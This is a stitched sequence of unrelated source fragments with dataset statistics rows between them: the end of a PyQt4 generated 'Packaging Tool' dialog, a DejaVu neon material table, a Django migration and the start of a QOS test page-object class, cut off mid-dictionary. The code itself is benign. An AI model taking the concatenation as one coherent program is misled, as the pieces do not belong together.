brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 85, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.frame_2.setPalette(palette)
self.frame_2.setAutoFillBackground(True)
self.frame_2.setFrameShape(QtGui.QFrame.StyledPanel)
self.frame_2.setFrameShadow(QtGui.QFrame.Raised)
self.frame_2.setObjectName(_fromUtf8("frame_2"))
self.label_2 = QtGui.QLabel(self.frame_2)
self.label_2.setGeometry(QtCore.QRect(10, 150, 81, 16))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.ToolTipText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Button, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Light, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Midlight, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Dark, brush)
brush = QtGui.QBrush(QtGui.QColor(170, 170, 170))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Mid, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.BrightText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ButtonText, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Base, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Window, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Shadow, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.AlternateBase, brush)
brush = QtGui.QBrush(QtGui.QColor(255, 255, 220))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipBase, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.ToolTipText, brush)
self.label_2.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(12)
font.setBold(False)
font.setItalic(False)
font.setWeight(50)
self.label_2.setFont(font)
self.label_2.setObjectName(_fromUtf8("label_2"))
self.tabWidget.addTab(self.dabao, _fromUtf8(""))
self.widget = QtGui.QWidget()
self.widget.setObjectName(_fromUtf8("widget"))
self.tabWidget.addTab(self.widget, _fromUtf8(""))
self.retranslateUi(Dialog)
self.tabWidget.setCurrentIndex(1)
QtCore.QMetaObject.connectSlotsByName(Dialog)
def retranslateUi(self, Dialog):
Dialog.setWindowTitle(_translate("Dialog", "Dialog", None))
self.label_3.setText(_translate("Dialog", "Packaging Tool", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.index), _translate("Dialog", "Home", None))
self.groupBox.setTitle(_translate("Dialog", "Packaging Tool", None))
self.label.setText(_translate("Dialog", "Quick Packaging", None))
self.label_2.setText(_translate("Dialog", "Configuration Management", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.dabao), _translate("Dialog", "Packaging Tool", None))
self.tabWidget.setTabText(self.tabWidget.indexOf(self.widget), _translate("Dialog", "Third-Party Plugins", None))
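# Usage sketch (an assumption: this pyuic4 output defines a Ui_Dialog class
# whose opening lines fall above this excerpt). Generated Ui_* classes are
# driven by instantiating a plain QDialog and handing it to setupUi():
#
#   import sys
#   from PyQt4 import QtGui
#
#   app = QtGui.QApplication(sys.argv)
#   dialog = QtGui.QDialog()
#   ui = Ui_Dialog()          # hypothetical name, not visible in this excerpt
#   ui.setupUi(dialog)
#   dialog.show()
#   sys.exit(app.exec_())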
| 58.738205
| 106
| 0.692563
| 7,570
| 63,496
| 5.800793
| 0.024174
| 0.188582
| 0.114775
| 0.150642
| 0.953065
| 0.947941
| 0.940745
| 0.939675
| 0.938513
| 0.938513
| 0
| 0.04665
| 0.182342
| 63,496
| 1,080
| 107
| 58.792593
| 0.799145
| 0.003449
| 0
| 0.920188
| 1
| 0
| 0.002482
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.004695
| false
| 0
| 0.000939
| 0.002817
| 0.00939
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ddf5a78beaa8080110bb6eda6e1e720ce67391f3
| 9,872
|
py
|
Python
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | 8
|
2021-12-14T21:30:01.000Z
|
2022-02-14T11:30:03.000Z
|
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
resources/mgltools_x86_64Linux2_1.5.6/MGLToolsPckgs/DejaVu/materialsDef/neon.py
|
J-E-J-S/aaRS-Pipeline
|
43f59f28ab06e4b16328c3bc405cdddc6e69ac44
|
[
"MIT"
] | null | null | null |
# material definition table: neon
#
neon = [
[ # 0
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.398733, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 1
[[0.0972973, 0.0972973, 0.0972973, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.628573, 1.0, 1.0]], # emission
[[0.47027, 0.47027, 0.47027, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 2
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.871763, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 3
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.7155, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 4
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.577069, 0.0, 1.0]], # emission
[[0.383784, 0.383784, 0.383784, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 5
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.442751, 0.0, 1.0]], # emission
[[0.475676, 0.475676, 0.475676, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 6
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.318894, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0864865], # shininess
[ 1.0], # opacity
],
[ # 7
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.151505, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 8
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 9
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.0807333, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 10
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.265757, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 11
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0, 0.34678, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 12
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0188407, 0.940276, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 13
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.0790818, 0.656922, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 14
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.934028, 0.00304288, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 15
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.755836, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 16
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.58832, 0.0172936, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 17
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.460235, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 18
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.17496, 0.0, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 19
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.135953, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 20
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.277276, 1.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 21
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.2805, 0.39661, 1.0]], # emission
[[0.616216, 0.616216, 0.616216, 1.0]], # specular
[0.0810811], # shininess
[ 1.0], # opacity
],
[ # 22
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 0.2805, 0.040678, 1.0]], # emission
[[0.616216, 0.616216, 0.616216, 1.0]], # specular
[0.0810811], # shininess
[ 1.0], # opacity
],
[ # 23
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.734243, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 24
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.921769, 0.544218, 0.0, 1.0]], # emission
[[0.637764, 0.37654, 0.0, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 25
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[1.0, 0.286509, 0.159322, 1.0]], # emission
[[0.535135, 0.535135, 0.535135, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 26
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.667797, 0.0769664, 0.171099, 1.0]], # emission
[[0.497297, 0.497297, 0.497297, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 27
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.59083, 0.0582792, 0.307405, 1.0]], # emission
[[0.6, 0.6, 0.6, 1.0]], # specular
[0.0756757], # shininess
[ 1.0], # opacity
],
[ # 28
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.595346, 0.187689, 0.595358, 1.0]], # emission
[[0.47027, 0.47027, 0.47027, 1.0]], # specular
[0.0540541], # shininess
[ 1.0], # opacity
],
[ # 29
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.456346, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 30
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0, 1.0, 0.168349, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 31
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.0239058, 1.0, 0.00238997, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 32
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.363921, 1.0, 0.0478005, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 33
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.559606, 1.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
[ # 34
[[0.0, 0.0, 0.0, 1.0]], # ambient
[[0.0, 0.0, 0.0, 1.0]], # diffuse
[[0.757687, 1.0, 0.0, 1.0]], # emission
[[0.622449, 0.622449, 0.622449, 1.0]], # specular
[0.0510204], # shininess
[ 1.0], # opacity
],
]
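# A minimal sketch (an assumption, not DejaVu's actual rendering code) of how
# one entry of this table could be handed to OpenGL through PyOpenGL. The
# shininess values here appear normalized to [0, 1], so the sketch scales them
# to OpenGL's [0, 128]; opacity would typically feed the alpha channel of the
# diffuse color rather than a separate material parameter.
from OpenGL.GL import (GL_AMBIENT, GL_DIFFUSE, GL_EMISSION, GL_FRONT,
                       GL_SHININESS, GL_SPECULAR, glMaterialf, glMaterialfv)

def apply_neon_material(index):
    # Unpack one row of the table defined above.
    ambient, diffuse, emission, specular, shininess, opacity = neon[index]
    glMaterialfv(GL_FRONT, GL_AMBIENT, ambient[0])
    glMaterialfv(GL_FRONT, GL_DIFFUSE, diffuse[0])
    glMaterialfv(GL_FRONT, GL_EMISSION, emission[0])
    glMaterialfv(GL_FRONT, GL_SPECULAR, specular[0])
    glMaterialf(GL_FRONT, GL_SHININESS, shininess[0] * 128.0)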
| 34.638596
| 61
| 0.398906
| 1,510
| 9,872
| 2.607947
| 0.072185
| 0.204165
| 0.223972
| 0.216353
| 0.843068
| 0.843068
| 0.832402
| 0.832402
| 0.832402
| 0.773997
| 0
| 0.367226
| 0.36639
| 9,872
| 284
| 62
| 34.760563
| 0.26235
| 0.218497
| 0
| 0.712766
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
fb0be3b2014f4cb9b13059f7dcf2f91a609323f9
| 1,938
|
py
|
Python
|
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | 1
|
2021-03-17T21:37:53.000Z
|
2021-03-17T21:37:53.000Z
|
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | null | null | null |
odata/migrations/0002_auto_20211018_1635.py
|
krishnaansh/djongo-mongo
|
af0afd7a9028b91eeca520c4c558c026a92971ac
|
[
"MIT"
] | 1
|
2021-03-02T19:35:18.000Z
|
2021-03-02T19:35:18.000Z
|
# Generated by Django 3.0.5 on 2021-10-18 11:05
from django.db import migrations
import djongo.models.fields
class Migration(migrations.Migration):
dependencies = [
('odata', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='categories',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='customer',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='newslettersubscription',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='payment',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='product',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='productimage',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='productvariant',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
migrations.AlterField(
model_name='userforgotpassword',
name='id',
field=djongo.models.fields.ObjectIdField(auto_created=True, primary_key=True, serialize=False),
),
]
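# Applying this migration follows the standard Django workflow:
#
#   python manage.py migrate odata
#
# AlterField operations are reversible, so `python manage.py migrate odata
# 0001_initial` would restore the id fields as defined by the initial
# migration.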
| 35.236364
| 107
| 0.615067
| 190
| 1,938
| 6.142105
| 0.247368
| 0.092545
| 0.138817
| 0.1988
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0.756641
| 0
| 0.013466
| 0.27193
| 1,938
| 54
| 108
| 35.888889
| 0.813607
| 0.02322
| 0
| 0.666667
| 1
| 0
| 0.069276
| 0.011634
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.020833
| 0.041667
| 0
| 0.104167
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
34908c74a80f6b0bdedcb4334adb4a1c75134a30
| 5,194
|
py
|
Python
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 1
|
2020-04-23T15:22:16.000Z
|
2020-04-23T15:22:16.000Z
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 44
|
2020-08-13T19:35:41.000Z
|
2021-03-01T09:08:00.000Z
|
AutomationFramework/page_objects/qos/qos.py
|
sbarguil/Testing-framework
|
f3ef69f1c4f0aeafd02e222d846162c711783b15
|
[
"Apache-2.0"
] | 6
|
2020-04-23T15:29:38.000Z
|
2022-03-03T14:23:38.000Z
|
from AutomationFramework.page_objects.base.base_page_object import BasePageObject
class QOS(BasePageObject):
variables_paths = {
'qos_queue_name': [
{
'name': 'qos/queues/queue/name',
}
],
'qos_queue_minth': [
{
'name': 'qos/queues/queue/name',
'queue_type': 'qos/queues/queue/config/queue-type',
'minth': 'qos/queues/queue/red/config/minth',
}
],
'qos_queue_maxth': [
{
'name': 'qos/queues/queue/name',
'queue_type': 'qos/queues/queue/config/queue-type',
'maxth': 'qos/queues/queue/red/config/maxth',
}
],
'qos_scheduler_policy_name': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
}
],
'qos_scheduler_sequence': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
}
],
'qos_scheduler_id': [
{
'name': 'qos/scheduler-policies/scheduler-policy/name',
'sequence': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/sequence',
'id': 'qos/scheduler-policies/scheduler-policy/schedulers/scheduler/inputs/input/id',
}
],
'qos_scheduler_queue': [
{
